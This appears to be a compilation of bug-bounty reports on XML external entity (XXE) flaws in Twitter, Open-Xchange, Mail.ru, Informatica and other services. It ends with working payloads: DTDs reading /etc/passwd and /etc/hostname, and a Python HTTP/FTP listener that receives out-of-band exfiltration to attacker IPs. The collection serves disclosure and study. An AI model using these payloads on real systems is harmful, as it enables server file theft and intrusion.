Researcher was able to get a backend server (a 3rd party server) to reach out to the attacker controlled server (122.180.248.81) to retrieve an XML external entity. This was a blind XXE, researcher was unable to extract sensitive info. Below demonstrates the PoC XXE SSRF.
The modified request with the XML Payload in the HTTP POST request body:
Burp Suite Repeater with payload and response
The web server logs show the backend server (8.36.86.68) reaching out to retrieve the XML External Entity:
Researcher discovered XXE vulnerability on a cloudhopper sxmp servlet on sms-be-vip.twitter.com domain. This XXE allowed local file retrieval and SSRF. The HTTP POST request on the /api/sxmp/1.0 path is vulnerable to XXE, the payload can be seen on lines 7-11:
HTTP Response contains the contents of the /etc/passwd file in an error message:
Researcher discovered a powerpoint file parser on an Open-Xchange server that parses XML external entities. The researcher was able to extract web server files to an attacker controlled server.
The process is as follows:
Create powerpoint file. Use winrar to open newly created powerpoint file. Open the tableStyles.xml file which should look like this:
Attach the payload in the second line of the tableStyles.xml file and save the file:
The python code runs on the attacker controlled server. Once it receives an HTTP request it returns the DTD which extracts the /etc/hostname file and exports it to the attacker controlled server via FTP. The DTD can be seen on line 12-13. Lines 19-26 emulate an HTTP server and serve the DTD. Lines 27-56 are the FTP server which waits for the connection from the victim server and reads the input.
With the python code running on the attacker controlled server, the malicious powerpoint file is uploaded to the Open-Xchange server. This successfully forces the backend server to parse the powerpoint file processing the tableStyles.xml file therein, then issue an HTTP request to retrieve the DTD, process it and exfiltrate the /etc/hostname file via FTP to the attacker controlled server. The hostname extracted is shown below:
sandbox-1
This is a successful XXE Out-of-Band exploit to retrieve web server files to an attacker controlled server utilizing HTTP and FTP.
"VoiceXML (VXML) is a digital document standard for specifying interactive media and voice dialogs between humans and computers. It is used for developing audio and voice response applications"
When a user purchases a phone number through █████, they are given an option to forward inbound calls to an Interactive Voice Response (IVR) script (containing VoiceXML".
An attacker can create a VoiceXML file containing DTD's and the IVR system will process the entities.
Upload the following payload.VXML and lol.xml files to the attacker controlled web server web root:
payload.vxml
lol.xml
Visit the website, click "edit" phone number. Click "Forward to VoiceXML" and insert your attacker controlled URL and script https://attacker.com/payload.vxml.
Start a netcat listener on attacker controlled web server and call the phone number.
The service will retrieve the payload.vxml file and output the contents of /etc/passwd to the attacker controlled web server on port 1337.
The Site Audit function spiders a given website and performs analysis on the discovered pages. In order to improve website spidering the URL of a sitemap.xml file can be provided. If provided, the sitemap.xml file will be downloaded and processed by a Java XML processor.
The Java xml processor used is vulnerable to XXE attacks. By providing an external document type declaration (DTD) the XML processor can be coerced into processing external entities,
Malicious sitemap.xml containing XXE payload in lines 2-4 with the External Entity &xxe; within the <loc> value to make web server reach out for XML External Entity:
Web server logs showing the XML parser retrieving the XML External Entity:
This vulnerability was further exploited to retrieve the directory listing of the /home path:
sitemap.xml
combine.dtd
Attacker web server logs showing the output of the /home directory listing:
Another XXE on Mail.ru domain where the researcher illustrated blind XXE with the ability to detect files on the server by the success of the XXE SSRF reaching out to the attacker controlled server (no XXE SSRF occurs if the file does not exist).
XML Payload:
Multiple requests follow the upload of the file from the Mail.ru backend server to the attacker controlled server.
Researcher found that a HTTP POST route /edit-profile-avatar!uploadImage.jspa for uploading user profile avatars was vulnerable to XXE. The backend server processes the JPEG image and parses the XMP Metadata which is vulnerable to XXE.
The image below contains part of the JPEG file data with the XMP Metadata containing the payload:
JPEG XMP Metadata containing XXE Payload
Web server logs:
The researcher further exploited this to retrieve the web server /etc/passwd file Out-of-Band via FTP. Unfortunately the payload used in the image is not included in the report.
DTD Used
Attacker controlled FTP Server retrieving the /etc/passwd file from the vulnerable Informatica web server:
Informatica
HTTP POST request SAMLResponse body parameter vulnerable to XXE. Researcher inserted the payload into the base64 encoded body parameter.
Payload:
<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "http://evilhost"> %asd;]>
HTTP POST Request:
Attacker controlled server(95.213.191.87) shows the internal Informatica server(54.149.98.204) reaching out to retrieve XML External Entity:
HTTP POST request accepts XML body with XXE payload. I believe the error message is just for the PoC and removing the '1' after "///etc/passwd1" would return the full file.
Payload:
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd1" >]><count><tabName>profile</tabName><widgetID>&xxe;</widgetID><filterType>Only</filterType>
HTTP POST Request with payload:
Response below:
Informatica (3)
Researcher discovered request that contained JSON body, by changing the HTTP Header content type from 'application/json' to 'application/xml' and converting the JSON to XML, the web server responded with an error message. The researcher was then able to retrieve the /etc/passwd file Out-of-Band.
Original Request Unmodified:
Modified Request changing content type and converting JSON to XML:
HTTP Response:
Researcher then changed the payload to retrieve the /etc/passwd file through an Out-of-Band vector:
Researcher discovered that a file upload function is vulnerable to XXE. Quoting the researcher 4cad:
The core of the vulnerability is in how the translate-toolkit processes .XLF files. The XLIFF standard is XML based, and thus supports by default standard XML functionality including external entity execution
The researcher retrieved a standard template file from the application. Then modified the file to contain the two-line payload after the '<?xml' tag and replaced one of the translation texts with '&xxe;'.
Two-line Payload:
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
The full modified file with the replaced translation text '&xxe;' in line 27:
Uploading the file, the web server outputs the contents of the /etc/passwd file in the Web UI:
<?xml version="1.0"?>
<operation type="deliver">
<error code="1010" message="Unable to convert [root:x:0:0:root:/root:/bin/bash...[truncated by researcher] to an integer for [operatorId]"/>
</operation>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE a:tblStyleLst [<!ELEMENT a:tblStyleLst ANY ><!ENTITY % sp SYSTEM "http://54.227.205.198:443/">%sp;%param1;]>
<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}">&exfil;</a:tblStyleLst>
#!/usr/env/python
# coding: utf-8
from __future__ import print_function
import socket
HOST = '54.227.205.198'
PORT = 443
# this DTD will be returned at first HTTP-request
dtd = '''<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://{}:{}/%data;'>">'''.format(HOST, PORT)
# Create socket and bins it to all interfaces and chosen port
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',PORT))
s.listen(1)
conn,addr = s.accept() # await for incoming HTTP-connection
print('-> HTTP-connection accepted')
# Read request and send DTD, emulating the HTTP-server
data = conn.recv(1024)
conn.sendall('HTTP/1.1 200 OK\r\nContent-length: {len}\r\n\r\n{dtd}'.format(len=len(dtd), dtd=dtd))
print('-> DTD sent')
conn.close()
conn,addr = s.accept() # await for incoming FTP-connection
print('-> FTP-connection accepted')
conn.sendall('220 FTP\r\n') # emulate FTP-server
stop = False
while not stop:
data = str(conn.recv(1024)) # read client commands
# if the client sends USER, ask for password to emulate
# FTP-authentication properly
if data.startswith('USER'):
conn.sendall('331 password please\r\n')
# RETR command would contain the extracted data
elif data.startswith('RETR'):
print('-> RETR command received, extracted data:')
print('-'*30)
print(data.split(' ', 1)[-1])
stop = True
elif data.startswith('QUIT'): # stop, it client asks
stop = True
# asks for more data otherwise
else:
conn.sendall('230 more data please\r\n')
conn.close()
s.close()
<?xml version='1.0' encoding='UTF-8' ?>
<!DOCTYPE foo [
<!ENTITY % b SYSTEM "file:///etc/passwd">
<!ENTITY % asd SYSTEM "http://example.com/lol.xml"> %asd; %rrr;]>
<vxml version="2.1">
<form>
<block>
<prompt>payload executed</prompt>
</block>
</form>
</vxml>
<!ENTITY % c "<!ENTITY % rrr SYSTEM 'http://example,com:1337/%b;'>">%c;
